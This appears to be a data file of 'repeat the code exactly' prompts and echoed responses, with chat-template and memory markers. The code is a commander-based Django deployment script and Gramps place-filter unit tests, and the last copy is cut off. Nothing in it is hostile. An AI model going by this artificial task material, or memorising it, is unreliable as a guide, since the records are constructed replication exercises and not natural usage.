"content": "Replicate the code snippet exactly, without paraphrasing or reformatting:\n```python\n\"\"\"\nDeploy this project in dev/stage/production.\n\nRequires commander_ which is installed on the systems that need it.\n\n.. _commander: https://github.com/oremj/commander\n\nThis script is supposed to work in Python 2.6.\nThe only outside dependency is `virtualenv-2.7`.\n\"\"\"\n\nimport os\nimport sys\n\nsys.path.append(os.path.dirname(os.path.abspath(__file__)))\n\nfrom commander.deploy import task\nimport commander_settings as settings\n\nvenv_path = '../venv'\npy_path = venv_path + '/bin/python'\n\n\n@task\ndef update_code(ctx, tag):\n \"\"\"Update the code to a specific git reference (tag/sha/etc).\"\"\"\n with ctx.lcd(settings.SRC_DIR):\n ctx.local('git fetch')\n ctx.local('git checkout -f %s' % tag)\n ctx.local(\"find . -type f -name '*.pyc' -delete\")\n\n # Creating a virtualenv tries to open virtualenv/bin/python for\n # writing, but because virtualenv is using it, it fails.\n # So we delete it and let virtualenv create a new one.\n ctx.local('rm -f {0}/bin/python {1}/bin/python2.7'.format(\n venv_path,\n venv_path,\n ))\n ctx.local('virtualenv-2.7 {0}'.format(venv_path))\n\n # Activate virtualenv to append to path.\n activate_env = os.path.join(\n settings.SRC_DIR, venv_path, 'bin', 'activate_this.py'\n )\n execfile(activate_env, dict(__file__=activate_env))\n\n ctx.local('{0}/bin/pip install bin/peep-2.*.tar.gz'.format(venv_path))\n ctx.local('{0}/bin/peep install -r requirements.txt'.format(venv_path))\n ctx.local('virtualenv-2.7 --relocatable {0}'.format(venv_path))\n\n\n@task\ndef update_assets(ctx):\n with ctx.lcd(settings.SRC_DIR):\n ctx.local('{0} manage.py collectstatic --noinput'.format(py_path))\n\n\n@task\ndef update_db(ctx):\n \"\"\"Update the database schema, if necessary.\"\"\"\n\n with ctx.lcd(settings.SRC_DIR):\n ctx.local(\n '{0} manage.py migrate'.format(py_path)\n )\n\n\n@task\ndef install_cron(ctx):\n \"\"\"Use gen-crons.py method to install new crontab.\n\n Ops will need to adjust this to put it in the right place.\n\n \"\"\"\n with ctx.lcd(settings.SRC_DIR):\n ctx.local(\n '{0} ./bin/crontab/gen-crons.py -w {1} -u apache > '\n '/etc/cron.d/.{2}'.format(\n py_path,\n settings.SRC_DIR,\n settings.CRON_NAME\n )\n )\n ctx.local(\n 'mv /etc/cron.d/.{0} /etc/cron.d/{1}'.format(\n settings.CRON_NAME,\n settings.CRON_NAME\n )\n )\n\n\n@task\ndef deploy_app(ctx):\n \"\"\"Call the remote update script to push changes to webheads.\"\"\"\n ctx.local('/bin/touch %s' % settings.LOCAL_WSGI)\n\n\n@task\ndef update_info(ctx):\n \"\"\"Write info about the current state to a publicly visible file.\"\"\"\n with ctx.lcd(settings.SRC_DIR):\n ctx.local('date')\n ctx.local('git branch')\n ctx.local('git log -3')\n ctx.local('git status')\n ctx.local('git submodule status')\n ctx.local('git rev-parse HEAD > media/revision.txt')\n\n\n@task\ndef pre_update(ctx, ref=settings.UPDATE_REF):\n \"\"\"Update code to pick up changes to this file.\"\"\"\n update_code(ref)\n\n\n@task\ndef update(ctx):\n update_assets()\n # update_locales() # commented out till we switch on i18n\n update_db()\n\n\n@task\ndef deploy(ctx):\n install_cron()\n deploy_app()\n update_info()\n\n\n@task\ndef update_site(ctx, tag):\n \"\"\"Update the app to prep for deployment.\"\"\"\n pre_update(tag)\n update()\n```",
"role": "user"
}
] |
[
{
"content": "Replicate the code snippet exactly, without paraphrasing or reformatting:\n<|memory_start|>```python\n\"\"\"\nDeploy this project in dev/stage/production.\n\nRequires commander_ which is installed on the systems that need it.\n\n.. _commander: https://github.com/oremj/commander\n\nThis script is supposed to work in Python 2.6.\nThe only outside dependency is `virtualenv-2.7`.\n\"\"\"\n\nimport os\nimport sys\n\nsys.path.append(os.path.dirname(os.path.abspath(__file__)))\n\nfrom commander.deploy import task\nimport commander_settings as settings\n\nvenv_path = '../venv'\npy_path = venv_path + '/bin/python'\n\n\n@task\ndef update_code(ctx, tag):\n \"\"\"Update the code to a specific git reference (tag/sha/etc).\"\"\"\n with ctx.lcd(settings.SRC_DIR):\n ctx.local('git fetch')\n ctx.local('git checkout -f %s' % tag)\n ctx.local(\"find . -type f -name '*.pyc' -delete\")\n\n # Creating a virtualenv tries to open virtualenv/bin/python for\n # writing, but because virtualenv is using it, it fails.\n # So we delete it and let virtualenv create a new one.\n ctx.local('rm -f {0}/bin/python {1}/bin/python2.7'.format(\n venv_path,\n venv_path,\n ))\n ctx.local('virtualenv-2.7 {0}'.format(venv_path))\n\n # Activate virtualenv to append to path.\n activate_env = os.path.join(\n settings.SRC_DIR, venv_path, 'bin', 'activate_this.py'\n )\n execfile(activate_env, dict(__file__=activate_env))\n\n ctx.local('{0}/bin/pip install bin/peep-2.*.tar.gz'.format(venv_path))\n ctx.local('{0}/bin/peep install -r requirements.txt'.format(venv_path))\n ctx.local('virtualenv-2.7 --relocatable {0}'.format(venv_path))\n\n\n@task\ndef update_assets(ctx):\n with ctx.lcd(settings.SRC_DIR):\n ctx.local('{0} manage.py collectstatic --noinput'.format(py_path))\n\n\n@task\ndef update_db(ctx):\n \"\"\"Update the database schema, if necessary.\"\"\"\n\n with ctx.lcd(settings.SRC_DIR):\n ctx.local(\n '{0} manage.py migrate'.format(py_path)\n )\n\n\n@task\ndef install_cron(ctx):\n \"\"\"Use gen-crons.py method to install new crontab.\n\n Ops will need to adjust this to put it in the right place.\n\n \"\"\"\n with ctx.lcd(settings.SRC_DIR):\n ctx.local(\n '{0} ./bin/crontab/gen-crons.py -w {1} -u apache > '\n '/etc/cron.d/.{2}'.format(\n py_path,\n settings.SRC_DIR,\n settings.CRON_NAME\n )\n )\n ctx.local(\n 'mv /etc/cron.d/.{0} /etc/cron.d/{1}'.format(\n settings.CRON_NAME,\n settings.CRON_NAME\n )\n )\n\n\n@task\ndef deploy_app(ctx):\n \"\"\"Call the remote update script to push changes to webheads.\"\"\"\n ctx.local('/bin/touch %s' % settings.LOCAL_WSGI)\n\n\n@task\ndef update_info(ctx):\n \"\"\"Write info about the current state to a publicly visible file.\"\"\"\n with ctx.lcd(settings.SRC_DIR):\n ctx.local('date')\n ctx.local('git branch')\n ctx.local('git log -3')\n ctx.local('git status')\n ctx.local('git submodule status')\n ctx.local('git rev-parse HEAD > media/revision.txt')\n\n\n@task\ndef pre_update(ctx, ref=settings.UPDATE_REF):\n \"\"\"Update code to pick up changes to this file.\"\"\"\n update_code(ref)\n\n\n@task\ndef update(ctx):\n update_assets()\n # update_locales() # commented out till we switch on i18n\n update_db()\n\n\n@task\ndef deploy(ctx):\n install_cron()\n deploy_app()\n update_info()\n\n\n@task\ndef update_site(ctx, tag):\n \"\"\"Update the app to prep for deployment.\"\"\"\n pre_update(tag)\n update()\n```<|memory_end|>",
"role": "user"
}
] |
```python
"""
Deploy this project in dev/stage/production.
Requires commander_ which is installed on the systems that need it.
.. _commander: https://github.com/oremj/commander
This script is supposed to work in Python 2.6.
The only outside dependency is `virtualenv-2.7`.
"""
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
from commander.deploy import task
import commander_settings as settings
venv_path = '../venv'
py_path = venv_path + '/bin/python'
@task
def update_code(ctx, tag):
"""Update the code to a specific git reference (tag/sha/etc)."""
with ctx.lcd(settings.SRC_DIR):
ctx.local('git fetch')
ctx.local('git checkout -f %s' % tag)
ctx.local("find . -type f -name '*.pyc' -delete")
# Creating a virtualenv tries to open virtualenv/bin/python for
# writing, but because virtualenv is using it, it fails.
# So we delete it and let virtualenv create a new one.
ctx.local('rm -f {0}/bin/python {1}/bin/python2.7'.format(
venv_path,
venv_path,
))
ctx.local('virtualenv-2.7 {0}'.format(venv_path))
# Activate virtualenv to append to path.
activate_env = os.path.join(
settings.SRC_DIR, venv_path, 'bin', 'activate_this.py'
)
execfile(activate_env, dict(__file__=activate_env))
ctx.local('{0}/bin/pip install bin/peep-2.*.tar.gz'.format(venv_path))
ctx.local('{0}/bin/peep install -r requirements.txt'.format(venv_path))
ctx.local('virtualenv-2.7 --relocatable {0}'.format(venv_path))
@task
def update_assets(ctx):
with ctx.lcd(settings.SRC_DIR):
ctx.local('{0} manage.py collectstatic --noinput'.format(py_path))
@task
def update_db(ctx):
"""Update the database schema, if necessary."""
with ctx.lcd(settings.SRC_DIR):
ctx.local(
'{0} manage.py migrate'.format(py_path)
)
@task
def install_cron(ctx):
"""Use gen-crons.py method to install new crontab.
Ops will need to adjust this to put it in the right place.
"""
with ctx.lcd(settings.SRC_DIR):
ctx.local(
'{0} ./bin/crontab/gen-crons.py -w {1} -u apache > '
'/etc/cron.d/.{2}'.format(
py_path,
settings.SRC_DIR,
settings.CRON_NAME
)
)
ctx.local(
'mv /etc/cron.d/.{0} /etc/cron.d/{1}'.format(
settings.CRON_NAME,
settings.CRON_NAME
)
)
@task
def deploy_app(ctx):
"""Call the remote update script to push changes to webheads."""
ctx.local('/bin/touch %s' % settings.LOCAL_WSGI)
@task
def update_info(ctx):
"""Write info about the current state to a publicly visible file."""
with ctx.lcd(settings.SRC_DIR):
ctx.local('date')
ctx.local('git branch')
ctx.local('git log -3')
ctx.local('git status')
ctx.local('git submodule status')
ctx.local('git rev-parse HEAD > media/revision.txt')
@task
def pre_update(ctx, ref=settings.UPDATE_REF):
"""Update code to pick up changes to this file."""
update_code(ref)
@task
def update(ctx):
update_assets()
# update_locales() # commented out till we switch on i18n
update_db()
@task
def deploy(ctx):
install_cron()
deploy_app()
update_info()
@task
def update_site(ctx, tag):
"""Update the app to prep for deployment."""
pre_update(tag)
update()
```
|
[
{
"content": "Repeat the code exactly:\n```python\n#\n# Gramps - a GTK+/GNOME based genealogy program\n#\n# Copyright (C) 2016 Tom Samstag\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\"\"\"\nUnittest that tests place-specific filter rules\n\"\"\"\nimport unittest\nimport os\n\nfrom gramps.gen.db.utils import import_as_dict\nfrom gramps.cli.user import User\nfrom gramps.gen.filters import GenericFilterFactory\nfrom gramps.gen.const import DATA_DIR\n\nfrom gramps.gen.filters.rules.place import (\n AllPlaces, HasCitation, HasGallery, HasIdOf, RegExpIdOf, HasNote,\n HasNoteRegexp, HasReferenceCountOf, HasSourceCount, HasSourceOf,\n PlacePrivate, MatchesSourceConfidence, HasData, HasNoLatOrLon,\n InLatLonNeighborhood, ChangedSince, HasTag, HasTitle, IsEnclosedBy)\n\nTEST_DIR = os.path.abspath(os.path.join(DATA_DIR, \"tests\"))\nEXAMPLE = os.path.join(TEST_DIR, \"example.gramps\")\nGenericPlaceFilter = GenericFilterFactory('Place')\n\nclass BaseTest(unittest.TestCase):\n \"\"\"\n Place rule tests.\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n \"\"\"\n Import example database.\n \"\"\"\n cls.db = import_as_dict(EXAMPLE, User())\n\n def filter_with_rule(self, rule):\n \"\"\"\n Apply a filter with the given rule.\n \"\"\"\n filter_ = GenericPlaceFilter()\n filter_.add_rule(rule)\n results = filter_.apply(self.db)\n return set(results)\n\n def test_allplaces(self):\n \"\"\"\n Test AllPlaces rule.\n \"\"\"\n rule = AllPlaces([])\n self.assertEqual(len(self.filter_with_rule(rule)),\n self.db.get_number_of_places())\n\n def test_hascitation(self):\n \"\"\"\n Test HasCitation rule.\n \"\"\"\n rule = HasCitation(['page 23', '', ''])\n self.assertEqual(self.filter_with_rule(rule),\n set([b'YNUJQC8YM5EGRG868J']))\n\n def test_hasgallery(self):\n \"\"\"\n Test HasGallery rule.\n \"\"\"\n rule = HasGallery(['0', 'greater than'])\n self.assertEqual(self.filter_with_rule(rule),\n set([b'YNUJQC8YM5EGRG868J']))\n\n def test_hasidof(self):\n \"\"\"\n Test HasIdOf rule.\n \"\"\"\n rule = HasIdOf(['P0001'])\n self.assertEqual(self.filter_with_rule(rule),\n set([b'c96587262e91149933fcea5f20a']))\n\n def test_regexpidof(self):\n \"\"\"\n Test RegExpIdOf rule.\n \"\"\"\n rule = RegExpIdOf(['P000.'], use_regex=True)\n self.assertEqual(self.filter_with_rule(rule), set([\n b'c96587262e91149933fcea5f20a', b'c96587262ff262aaac31f6db7af',\n b'c96587262f24c33ab2420276737', b'c96587262e566596a225682bf53',\n b'c9658726302661576894508202d', b'c96587262f8329d37b252e1b9e5',\n b'c965872630664f33485fc18e75', b'c96587262fb7dbb954077cb1286',\n b'c96587262f4a44183c65ff1e52', b'c96587262ed43fdb37bf04bdb7f',\n ]))\n\n def test_hasnote(self):\n \"\"\"\n Test HasNote rule.\n \"\"\"\n rule = HasNote([])\n self.assertEqual(self.filter_with_rule(rule), set([]))\n\n def test_hasnoteregexp(self):\n \"\"\"\n Test HasNoteRegexp rule.\n \"\"\"\n rule = HasNoteRegexp(['.'], use_regex=True)\n self.assertEqual(self.filter_with_rule(rule), set([]))\n\n def test_hasreferencecountof(self):\n \"\"\"\n Test HasReferenceCountOf rule.\n \"\"\"\n rule = HasReferenceCountOf(['greater than', '35'])\n self.assertEqual(self.filter_with_rule(rule), set([\n b'c96587262e566596a225682bf53', b'MATJQCJYH8ULRIRYTH',\n b'5HTJQCSB91P69HY731', b'4ECKQCWCLO5YIHXEXC',\n b'c965872630a68ebd32322c4a30a']))\n\n def test_hassourcecount(self):\n \"\"\"\n Test HasSourceCount rule.\n \"\"\"\n rule = HasSourceCount(['1', 'equal to'])\n self.assertEqual(self.filter_with_rule(rule),\n set([b'YNUJQC8YM5EGRG868J']))\n\n def test_hassourceof(self):\n \"\"\"\n Test HasSourceOf rule.\n \"\"\"\n rule = HasSourceOf(['S0001'])\n self.assertEqual(self.filter_with_rule(rule),\n set([b'YNUJQC8YM5EGRG868J']))\n\n def test_placeprivate(self):\n \"\"\"\n Test PlacePrivate rule.\n \"\"\"\n rule = PlacePrivate([])\n self.assertEqual(self.filter_with_rule(rule), set([]))\n\n def test_matchessourceconfidence(self):\n \"\"\"\n Test MatchesSourceConfidence rule.\n \"\"\"\n rule = MatchesSourceConfidence(['2'])\n self.assertEqual(self.filter_with_rule(rule),\n set([b'YNUJQC8YM5EGRG868J']))\n\n def test_hasdata(self):\n \"\"\"\n Test HasData rule.\n \"\"\"\n rule = HasData(['Albany', 'County', ''])\n self.assertEqual(self.filter_with_rule(rule),\n set([b'c9658726d602acadb74e330116a']))\n\n def test_hasnolatorlon(self):\n \"\"\"\n Test HasNoLatOrLon rule.\n \"\"\"\n rule = HasNoLatOrLon([])\n self.assertEqual(len(self.filter_with_rule(rule)), 921)\n\n def test_inlatlonneighborhood(self):\n \"\"\"\n Test InLatLonNeighborhood rule.\n \"\"\"\n rule = InLatLonNeighborhood(['30N', '90W', '2', '2'])\n self.assertEqual(self.filter_with_rule(rule), set([\n b'C6WJQC0GDYP3HZDPR3', b'N88LQCRB363ES5WJ83',\n b'03EKQCC2KTNLHFLDRJ', b'M9VKQCJV91X0M12J8']))\n\n def test_changedsince(self):\n \"\"\"\n Test ChangedSince rule.\n \"\"\"\n rule = ChangedSince(['2013-01-01', '2014-01-01'])\n self.assertEqual(len(self.filter_with_rule(rule)), 419)\n\n def test_hastag(self):\n \"\"\"\n Test HasTag rule.\n \"\"\"\n rule = HasTag(['ToDo'])\n self.assertEqual(self.filter_with_rule(rule), set([]))\n\n def test_hastitle(self):\n \"\"\"\n Test HasTitle rule.\n \"\"\"\n rule = HasTitle(['Albany'])\n self.assertEqual(self.filter_with_rule(rule), set([\n b'51VJQCXUP61H9JRL66', b'9XBKQCE1LZ7PMJE56G',\n b'c9658726d602acadb74e330116a', b'P9MKQCT08Z3YBJV5UB']))\n\n def test_isenclosedby(self):\n \"\"\"\n Test IsEnclosedBy rule.\n \"\"\"\n rule = IsEnclosedBy(['P0001', '0'])\n self.assertEqual(self.filter_with_rule(rule), set([\n b'EAFKQCR0ED5QWL87EO', b'S22LQCLUZM135LVKRL', b'VDUJQCFP24ZV3O4ID2',\n b'V6ALQCZZFN996CO4D', b'OC6LQCXMKP6NUVYQD8', b'CUUKQC6BY5LAZXLXC6',\n b'PTFKQCKPHO2VC5SYKS', b'PHUJQCJ9R4XQO5Y0WS']))\n\n def test_isenclosedby_inclusive(self):\n \"\"\"\n Test IsEnclosedBy rule with inclusive option.\n \"\"\"\n rule = IsEnclosedBy(['P0001', '1'])\n self.assertEqual(self.filter_with_rule(rule), set([\n b'c96587262e91149933fcea5f20a', b'EAFKQCR0ED5QWL87EO',\n b'S22LQCLUZM135LVKRL', b'VDUJQCFP24ZV3O4ID2', b'V6ALQCZZFN996CO4D',\n b'OC6LQCXMKP6NUVYQD8', b'CUUKQC6BY5LAZXLXC6', b'PTFKQCKPHO2VC5SYKS',\n b'PHUJQCJ9R4XQO5Y0WS']))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n```\nKeep all formatting and sequence.",
"role": "user"
}
] |
[
{
"content": "Repeat the code exactly:\n<|memory_start|>```python\n#\n# Gramps - a GTK+/GNOME based genealogy program\n#\n# Copyright (C) 2016 Tom Samstag\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\"\"\"\nUnittest that tests place-specific filter rules\n\"\"\"\nimport unittest\nimport os\n\nfrom gramps.gen.db.utils import import_as_dict\nfrom gramps.cli.user import User\nfrom gramps.gen.filters import GenericFilterFactory\nfrom gramps.gen.const import DATA_DIR\n\nfrom gramps.gen.filters.rules.place import (\n AllPlaces, HasCitation, HasGallery, HasIdOf, RegExpIdOf, HasNote,\n HasNoteRegexp, HasReferenceCountOf, HasSourceCount, HasSourceOf,\n PlacePrivate, MatchesSourceConfidence, HasData, HasNoLatOrLon,\n InLatLonNeighborhood, ChangedSince, HasTag, HasTitle, IsEnclosedBy)\n\nTEST_DIR = os.path.abspath(os.path.join(DATA_DIR, \"tests\"))\nEXAMPLE = os.path.join(TEST_DIR, \"example.gramps\")\nGenericPlaceFilter = GenericFilterFactory('Place')\n\nclass BaseTest(unittest.TestCase):\n \"\"\"\n Place rule tests.\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n \"\"\"\n Import example database.\n \"\"\"\n cls.db = import_as_dict(EXAMPLE, User())\n\n def filter_with_rule(self, rule):\n \"\"\"\n Apply a filter with the given rule.\n \"\"\"\n filter_ = GenericPlaceFilter()\n filter_.add_rule(rule)\n results = filter_.apply(self.db)\n return set(results)\n\n def test_allplaces(self):\n \"\"\"\n Test AllPlaces rule.\n \"\"\"\n rule = AllPlaces([])\n self.assertEqual(len(self.filter_with_rule(rule)),\n self.db.get_number_of_places())\n\n def test_hascitation(self):\n \"\"\"\n Test HasCitation rule.\n \"\"\"\n rule = HasCitation(['page 23', '', ''])\n self.assertEqual(self.filter_with_rule(rule),\n set([b'YNUJQC8YM5EGRG868J']))\n\n def test_hasgallery(self):\n \"\"\"\n Test HasGallery rule.\n \"\"\"\n rule = HasGallery(['0', 'greater than'])\n self.assertEqual(self.filter_with_rule(rule),\n set([b'YNUJQC8YM5EGRG868J']))\n\n def test_hasidof(self):\n \"\"\"\n Test HasIdOf rule.\n \"\"\"\n rule = HasIdOf(['P0001'])\n self.assertEqual(self.filter_with_rule(rule),\n set([b'c96587262e91149933fcea5f20a']))\n\n def test_regexpidof(self):\n \"\"\"\n Test RegExpIdOf rule.\n \"\"\"\n rule = RegExpIdOf(['P000.'], use_regex=True)\n self.assertEqual(self.filter_with_rule(rule), set([\n b'c96587262e91149933fcea5f20a', b'c96587262ff262aaac31f6db7af',\n b'c96587262f24c33ab2420276737', b'c96587262e566596a225682bf53',\n b'c9658726302661576894508202d', b'c96587262f8329d37b252e1b9e5',\n b'c965872630664f33485fc18e75', b'c96587262fb7dbb954077cb1286',\n b'c96587262f4a44183c65ff1e52', b'c96587262ed43fdb37bf04bdb7f',\n ]))\n\n def test_hasnote(self):\n \"\"\"\n Test HasNote rule.\n \"\"\"\n rule = HasNote([])\n self.assertEqual(self.filter_with_rule(rule), set([]))\n\n def test_hasnoteregexp(self):\n \"\"\"\n Test HasNoteRegexp rule.\n \"\"\"\n rule = HasNoteRegexp(['.'], use_regex=True)\n self.assertEqual(self.filter_with_rule(rule), set([]))\n\n def test_hasreferencecountof(self):\n \"\"\"\n Test HasReferenceCountOf rule.\n \"\"\"\n rule = HasReferenceCountOf(['greater than', '35'])\n self.assertEqual(self.filter_with_rule(rule), set([\n b'c96587262e566596a225682bf53', b'MATJQCJYH8ULRIRYTH',\n b'5HTJQCSB91P69HY731', b'4ECKQCWCLO5YIHXEXC',\n b'c965872630a68ebd32322c4a30a']))\n\n def test_hassourcecount(self):\n \"\"\"\n Test HasSourceCount rule.\n \"\"\"\n rule = HasSourceCount(['1', 'equal to'])\n self.assertEqual(self.filter_with_rule(rule),\n set([b'YNUJQC8YM5EGRG868J']))\n\n def test_hassourceof(self):\n \"\"\"\n Test HasSourceOf rule.\n \"\"\"\n rule = HasSourceOf(['S0001'])\n self.assertEqual(self.filter_with_rule(rule),\n set([b'YNUJQC8YM5EGRG868J']))\n\n def test_placeprivate(self):\n \"\"\"\n Test PlacePrivate rule.\n \"\"\"\n rule = PlacePrivate([])\n self.assertEqual(self.filter_with_rule(rule), set([]))\n\n def test_matchessourceconfidence(self):\n \"\"\"\n Test MatchesSourceConfidence rule.\n \"\"\"\n rule = MatchesSourceConfidence(['2'])\n self.assertEqual(self.filter_with_rule(rule),\n set([b'YNUJQC8YM5EGRG868J']))\n\n def test_hasdata(self):\n \"\"\"\n Test HasData rule.\n \"\"\"\n rule = HasData(['Albany', 'County', ''])\n self.assertEqual(self.filter_with_rule(rule),\n set([b'c9658726d602acadb74e330116a']))\n\n def test_hasnolatorlon(self):\n \"\"\"\n Test HasNoLatOrLon rule.\n \"\"\"\n rule = HasNoLatOrLon([])\n self.assertEqual(len(self.filter_with_rule(rule)), 921)\n\n def test_inlatlonneighborhood(self):\n \"\"\"\n Test InLatLonNeighborhood rule.\n \"\"\"\n rule = InLatLonNeighborhood(['30N', '90W', '2', '2'])\n self.assertEqual(self.filter_with_rule(rule), set([\n b'C6WJQC0GDYP3HZDPR3', b'N88LQCRB363ES5WJ83',\n b'03EKQCC2KTNLHFLDRJ', b'M9VKQCJV91X0M12J8']))\n\n def test_changedsince(self):\n \"\"\"\n Test ChangedSince rule.\n \"\"\"\n rule = ChangedSince(['2013-01-01', '2014-01-01'])\n self.assertEqual(len(self.filter_with_rule(rule)), 419)\n\n def test_hastag(self):\n \"\"\"\n Test HasTag rule.\n \"\"\"\n rule = HasTag(['ToDo'])\n self.assertEqual(self.filter_with_rule(rule), set([]))\n\n def test_hastitle(self):\n \"\"\"\n Test HasTitle rule.\n \"\"\"\n rule = HasTitle(['Albany'])\n self.assertEqual(self.filter_with_rule(rule), set([\n b'51VJQCXUP61H9JRL66', b'9XBKQCE1LZ7PMJE56G',\n b'c9658726d602acadb74e330116a', b'P9MKQCT08Z3YBJV5UB']))\n\n def test_isenclosedby(self):\n \"\"\"\n Test IsEnclosedBy rule.\n \"\"\"\n rule = IsEnclosedBy(['P0001', '0'])\n self.assertEqual(self.filter_with_rule(rule), set([\n b'EAFKQCR0ED5QWL87EO', b'S22LQCLUZM135LVKRL', b'VDUJQCFP24ZV3O4ID2',\n b'V6ALQCZZFN996CO4D', b'OC6LQCXMKP6NUVYQD8', b'CUUKQC6BY5LAZXLXC6',\n b'PTFKQCKPHO2VC5SYKS', b'PHUJQCJ9R4XQO5Y0WS']))\n\n def test_isenclosedby_inclusive(self):\n \"\"\"\n Test IsEnclosedBy rule with inclusive option.\n \"\"\"\n rule = IsEnclosedBy(['P0001', '1'])\n self.assertEqual(self.filter_with_rule(rule), set([\n b'c96587262e91149933fcea5f20a', b'EAFKQCR0ED5QWL87EO',\n b'S22LQCLUZM135LVKRL', b'VDUJQCFP24ZV3O4ID2', b'V6ALQCZZFN996CO4D',\n b'OC6LQCXMKP6NUVYQD8', b'CUUKQC6BY5LAZXLXC6', b'PTFKQCKPHO2VC5SYKS',\n b'PHUJQCJ9R4XQO5Y0WS']))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n```<|memory_end|>\nKeep all formatting and sequence.",
"role": "user"
}
] |
```python
#
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2016 Tom Samstag
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
"""
Unittest that tests place-specific filter rules
"""
import unittest
import os
from gramps.gen.db.utils import import_as_dict
from gramps.cli.user import User
from gramps.gen.filters import GenericFilterFactory
from gramps.gen.const import DATA_DIR
from gramps.gen.filters.rules.place import (
AllPlaces, HasCitation, HasGallery, HasIdOf, RegExpIdOf, HasNote,
HasNoteRegexp, HasReferenceCountOf, HasSourceCount, HasSourceOf,
PlacePrivate, MatchesSourceConfidence, HasData, HasNoLatOrLon,
InLatLonNeighborhood, ChangedSince, HasTag, HasTitle, IsEnclosedBy)
TEST_DIR = os.path.abspath(os.path.join(DATA_DIR, "tests"))
EXAMPLE = os.path.join(TEST_DIR, "example.gramps")
GenericPlaceFilter = GenericFilterFactory('Place')
class BaseTest(unittest.TestCase):
"""
Place rule tests.
"""
@classmethod
def setUpClass(cls):
"""
Import example database.
"""
cls.db = import_as_dict(EXAMPLE, User())
def filter_with_rule(self, rule):
"""
Apply a filter with the given rule.
"""
filter_ = GenericPlaceFilter()
filter_.add_rule(rule)
results = filter_.apply(self.db)
return set(results)
def test_allplaces(self):
"""
Test AllPlaces rule.
"""
rule = AllPlaces([])
self.assertEqual(len(self.filter_with_rule(rule)),
self.db.get_number_of_places())
def test_hascitation(self):
"""
Test HasCitation rule.
"""
rule = HasCitation(['page 23', '', ''])
self.assertEqual(self.filter_with_rule(rule),
set([b'YNUJQC8YM5EGRG868J']))
def test_hasgallery(self):
"""
Test HasGallery rule.
"""
rule = HasGallery(['0', 'greater than'])
self.assertEqual(self.filter_with_rule(rule),
set([b'YNUJQC8YM5EGRG868J']))
def test_hasidof(self):
"""
Test HasIdOf rule.
"""
rule = HasIdOf(['P0001'])
self.assertEqual(self.filter_with_rule(rule),
set([b'c96587262e91149933fcea5f20a']))
def test_regexpidof(self):
"""
Test RegExpIdOf rule.
"""
rule = RegExpIdOf(['P000.'], use_regex=True)
self.assertEqual(self.filter_with_rule(rule), set([
b'c96587262e91149933fcea5f20a', b'c96587262ff262aaac31f6db7af',
b'c96587262f24c33ab2420276737', b'c96587262e566596a225682bf53',
b'c9658726302661576894508202d', b'c96587262f8329d37b252e1b9e5',
b'c965872630664f33485fc18e75', b'c96587262fb7dbb954077cb1286',
b'c96587262f4a44183c65ff1e52', b'c96587262ed43fdb37bf04bdb7f',
]))
def test_hasnote(self):
"""
Test HasNote rule.
"""
rule = HasNote([])
self.assertEqual(self.filter_with_rule(rule), set([]))
def test_hasnoteregexp(self):
"""
Test HasNoteRegexp rule.
"""
rule = HasNoteRegexp(['.'], use_regex=True)
self.assertEqual(self.filter_with_rule(rule), set([]))
def test_hasreferencecountof(self):
"""
Test HasReferenceCountOf rule.
"""
rule = HasReferenceCountOf(['greater than', '35'])
self.assertEqual(self.filter_with_rule(rule), set([
b'c96587262e566596a225682bf53', b'MATJQCJYH8ULRIRYTH',
b'5HTJQCSB91P69HY731', b'4ECKQCWCLO5YIHXEXC',
b'c965872630a68ebd32322c4a30a']))
def test_hassourcecount(self):
"""
Test HasSourceCount rule.
"""
rule = HasSourceCount(['1', 'equal to'])
self.assertEqual(self.filter_with_rule(rule),
set([b'YNUJQC8YM5EGRG868J']))
def test_hassourceof(self):
"""
Test HasSourceOf rule.
"""
rule = HasSourceOf(['S0001'])
self.assertEqual(self.filter_with_rule(rule),
set([b'YNUJQC8YM5EGRG868J']))
def test_placeprivate(self):
"""
Test PlacePrivate rule.
"""
rule = PlacePrivate([])
self.assertEqual(self.filter_with_rule(rule), set([]))
def test_matchessourceconfidence(self):
"""
Test MatchesSourceConfidence rule.
"""
rule = MatchesSourceConfidence(['2'])
self.assertEqual(self.filter_with_rule(rule),
set([b'YNUJQC8YM5EGRG868J']))
def test_hasdata(self):
"""
Test HasData rule.
"""
rule = HasData(['Albany', 'County', ''])
self.assertEqual(self.filter_with_rule(rule),
set([b'c9658726d602acadb74e330116a']))
def test_hasnolatorlon(self):
"""
Test HasNoLatOrLon rule.
"""
rule = HasNoLatOrLon([])
self.assertEqual(len(self.filter_with_rule(rule)), 921)
def test_inlatlonneighborhood(self):
"""
Test InLatLonNeighborhood rule.
"""
rule = InLatLonNeighborhood(['30N', '90W', '2', '2'])
